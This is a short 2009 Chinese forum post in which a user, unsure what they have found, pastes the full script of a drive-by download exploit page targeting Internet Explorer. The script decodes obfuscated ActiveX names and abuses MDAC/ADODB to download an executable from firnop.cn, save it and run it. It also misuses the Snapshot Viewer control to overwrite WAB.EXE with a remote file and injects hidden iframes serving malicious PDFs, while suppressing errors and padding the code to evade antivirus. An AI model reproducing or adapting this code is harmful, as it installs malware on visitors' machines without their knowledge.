---------------------------
Microsoft Internet Explorer
---------------------------
好像也只有pdf后缀可疑吧
88d969c5-f192-11d4-a65f-0040963251e5
06071漏洞?
才接触,不熟悉
<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<SCRIPT type='text/javascript'>
function errfuck() { return true; }
window.onerror=errfuck;
function dddec(str) {
cto="QHdtR1FKhPGv4VbuDxN0AE3fBgpXmOYIqzyJj5wTWnr2cL8ZilUaCM96So7kse"; cfrom="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"; res="";
for (i=0;i<str.length;i++) {
c=str.charAt(i); pos=cto.indexOf(c);
if (pos!=-1)
res+=cfrom.charAt(pos);
else
res+=c;
}
return res;
}
function goMDAC(){
d8= 0;
var Qy29Nd = document.createElement(dddec("hfDdER"));
Qy29Nd.setAttribute("id",dddec("p1MsU4"));
Qy29Nd.setAttribute("classid",dddec("ENvK4:lwsoZSSo-oSj9-CCwe-sk9j-eeZe6TZMsm9o"));
try{
var LoWMFJ = Qy29Nd.CreateObject(dddec("G4h4f.vRtdGg"),'');
var d8 = 1;
}catch(e){}
try{
var PEELt6 = Qy29Nd.CreateObject(dddec("5udNN.jPPNKEGRKhB"),'');
var d8 = 1;
}
catch(e){}
if(d8 == 1)
{
try
{
var JB7Ebp = Qy29Nd.CreateObject(dddec("gvAgNM.8acnYYJ"),'');
JB7Ebp.open("GET","http://firnop.cn/getexe.php?h=11",false);
JB7Ebp.send();
LoWMFJ.type = 1;
LoWMFJ.open();
LoWMFJ.Write(JB7Ebp.responseBody);
Frogxa = "..\\S87ekhV.exe";
LoWMFJ.SaveToFile(Frogxa,2);
eval(dddec("JmmcRo.5udNNmAdEFRd(TthbAG);"));
//return 1;
}
catch(e){}
}
}
function goPDF() {
wnd=window;
while (wnd.parent!=wnd)
wnd=wnd.parent;
wnd.location="getfile.php?f=vispdf";
}
function goSnap() {
var sfrom = 'http://firnop.cn/getexe.php?h=12';
var fuckavo="SB";
var x;
var fuckavp="SB";
var obj;
var fuckavx="SB";
var mycars = new Array();
var fuckava="SB";
mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
if(objlcx) {
setTimeout('window.location = "ldap://"',3000);
for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
var buf1 = sfrom;
var fuckavg="SB";
var buf2=mycars[x];
var fuckavj="SB";
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;
try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();
}catch(e){}
}
}
var fuckavqgga="SB";
var fuckavqggxa="SBd";
}
setTimeout('goMDAC();',3500);
setTimeout('goSnap();',1);
try {
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if (!obj) {
obj = new ActiveXObject("PDF.PdfCtrl");
}
if (obj) {
document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
setTimeout('goPDF();',5000);
}
} catch(e){
document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
setTimeout('goPDF();',5000);
}
</script>
[ 本帖最后由 lichun005 于 2009-1-13 22:56 编辑 ] |